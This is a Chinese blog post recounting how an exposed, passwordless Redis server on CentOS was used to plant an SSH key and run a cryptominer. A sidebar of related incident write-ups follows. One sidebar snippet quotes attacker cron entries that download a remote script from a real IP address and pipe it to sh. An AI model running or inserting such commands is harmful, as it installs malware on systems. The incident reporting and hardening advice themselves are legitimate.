Centos上由于redis漏洞被攻击

最新推荐文章于 2024-06-13 10:23:16 发布
最新推荐文章于 2024-06-13 10:23:16 发布
阅读量1.7k 收藏
点赞数
分类专栏: redis Linux 文章标签: centos redis 漏洞
Linux 同时被 2 个专栏收录
129 篇文章 0 订阅
订阅专栏
redis
20 篇文章 0 订阅
订阅专栏 
早上一直收到腾讯云报警,查看了下:
有个yam程序,占用大量CPU!!!

这里写图片描述

真他娘的纳闷,我服务器跑了什么我还不清楚?于是乎开始查哪来的?

于是我去百度了下 jyam -c x -M stratum+tcp 果不其然确实有这样的攻击,网上说这个攻击是由于redis未授权登陆漏洞引 起导致黑客利用的结果我去redis 控制台登录一看固然有个莫名其妙的key 刚好这个key 就是ssh的key于是断定黑客是从reids的未授权漏 洞登陆进来的(因为便宜服务器防火墙是关闭状态的端口全部开放的)
果然,我这服务器开了外网,上面跑了redis集群,被当做肉鸡了。

这里写图片描述

发现redis里面有陌生key:

这里写图片描述

那就先kill 删除吧

UpUpUpUpUpUpUp
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次centos7因redis默认端口被恶意植入病毒解决
SQLINGBING的博客
08-26 1319
centos7因为redis使用默认接口被攻击中了[scan]病毒后的解决
centos源码安装redis-3.2.11
04-28
centos源码安装redis-3.2.11
redis受到攻击
weixin_40083227的博客
05-03 422
今天被挖矿软件不小心植入脚本了,导致云服务器100%的CPU占用,被迫当肉鸡。原因是redis的默认端口没有改,也没有密码,就被攻击。 解决方法是 sudo kill -9 10053 && sudo userdel redis 必须要同时执行,这个脚本会自动唤醒,删除redis用户后,找到异常的脚本文件删除掉。然后卸载redis,sudo apt remove redis ...
如何在centos中和windows server中找到挖矿木马和消灭挖矿木马
最新发布
weixin_45631123的博客
06-13 801
解决挖矿木马
redis漏洞攻击
dwdqsa的博客
03-05 585
redis在无密码 且无bind情况下 黑客可以拿到root凌晨四点 服务器被攻击 之后服务器内存一直被udevs占满,疑似挖矿进程,删除会自动恢复去掉执行权限 chmod -x 后 杀掉进程 服务器正常...
Redis攻击纪实
程序员青菜学厨记
11-08 445
1、2017年时候测试环境安装的是Redis4.0版本(或者更低,记不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。注:忘记截屏了,重启了Redis,那个注入的key找不到了。
记一次Redis攻击事件
Dxx_23的博客
04-02 1043
redis版本为:7.2.4。
CentOS7安装redis
04-23
**RedisCentOS7上的安装指南** Redis是一个高性能的键值数据库,广泛应用于缓存、消息中间件等领域。在CentOS7系统上安装Redis需要遵循一系列步骤,下面将详细介绍整个过程。 ### 一、更新系统 在安装任何新...
CentOS6.4 安装Redis 教程详解
09-09
在本教程中,我们将深入探讨如何在CentOS 6.4操作系统上安装Redis,这是一个流行的开源内存数据结构存储系统,常被用作数据库、缓存和消息代理。以下是详细的安装步骤: 1. **检查和安装依赖**:在安装Redis之前,...
centos7部署redis脚本
12-16
centos7部署redis脚本///centos7部署redis脚本///centos7部署redis脚本///centos7部署redis脚本///centos7部署redis脚本///centos7部署redis脚本///centos7部署redis脚本///centos7部署redis脚本
CentOS 6.6下Redis安装配置记录
09-10
在本篇记录中,我们将详述如何在CentOS 6.6操作系统上安装和配置Redis,这是一个高性能的键值存储系统。首先,我们要确保系统具备安装Redis所需的支持环境。 1. **安装支持环境** 在安装Redis之前,我们需要安装...
Centos7 下 redis 入侵实战 - root提权
DevOps海洋的渔夫@专栏
12-06 477
知识铺垫 Redis 还有几个奇怪的功能:Linux 有一个功能可以通过一个端口写到本地文件,如果我要写一个文件,而这个文件是木马,那就自动拉起了。如果写入自己签名的公钥,用自己的私钥解公钥,自己解自己的,所以直接替换公钥,就是通过 Redis。 那么下面来实战演练一下通过redis匿名登陆写入反弹shell 环境准备 首先启动一个允许匿名登陆的redis服务器。 [...
Redis收到攻击怎么办
qq_45732538的博客
01-27 210
Redis防护建议(请您根据主机实际业务衡量进行防护) 1、Redis本身防护 (1)不要使用默认端口(6379) (2)增加Redis用户名和密码 (3)在Redis绑定指定IP访问(位置配置文件[redis.config]中的bind节点) 2、Linux服务器 (1)Redis服务器不要暴露在外网 (2)开启防火墙,限制IP可以访问(iptables命令) (3)用容器(如Docker等)管理起服务器,这样中病毒后排查不出原因需要重新装环境的时候影响小并且可以快速恢复 ...
Redis 也能被攻击?一次Redis被入侵的记录
探索云原生
12-05 5568
通过 RDB 方式入侵,Redis攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
云服务器上Redis数据库被攻击实录+总结
青衫客36的博客
05-15 1106
通过以上步骤,可以详细了解攻击过程,并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键,确保只有受信任的用户能够访问和管理服务器。计划任务格式:计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径:攻击者将 Redis 配置为将数据持久化到cron计划任务目录,如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用:通过 Redis 的SAVE。
[网络安全-1]Redis远程攻击漏洞分析与防护
shgh_2004的专栏
05-31 857
Redis远程攻击漏洞分析与防护 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥...
centosredis安全相关
diaotukai8020的博客
11-14 85
由于发现众多同学,在使用云服务器时,安装的redis3.0+版本都关闭了protected-mode,因而都遭遇了挖矿病毒的攻击,使得服务器99%的占用率!! 因此我们在使用redis时候,最好更改默认端口,并且使用redis密码登录。 redis.conf设置 protected-mode yes #打开保护模式 port 6380 #更改默认启动端口 requir...
Linux(CentOs)之安装Redis及注意事项
weixin_30564901的博客
08-22 137
1.redis简单说明   a.redis是一个key-value存储系统,它支持存储的value类型相比较Memcached更多,包括string,list,set,sets,hashes等(It supports data structures such as strings,hashes,lists,sets,sorted sets with range queries,bitm...
关于redis挂外网被攻击
a13627210064的博客
06-09 618
总结记录一下,今天遇见的一个问题。 在测试服务器的redis服务需要开通外网访问。 然后在开通外网访问之后没有限制访问ip(这里是大坑)。 然后被黑客给攻击了。 黑客通过redis运行命令插入了条wget命令,获取他自己写的sh脚本通过sbin/sh来运行他的脚本(copy数据库及一些关键的资料)。 查看了ip。195.3.146.118 特么还是代理的个国外的ip。 最后解决方案。 先关闭了redis的服务。然后先想着杀他的进程。 结果发现这小子循环执行wget一直在运行他的sh脚本。 然后做了一件蠢事-
CentOS 7上Redis的安装与配置教程
Redis是一款流行的内存数据库,广泛用于缓存、消息队列和数据存储等领域,由于其轻量级和高性能的特点,常被部署在Linux服务器上。 1. **安装Redis依赖**: Redis基于C语言编写,因此在安装前需要确保Linux环境中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值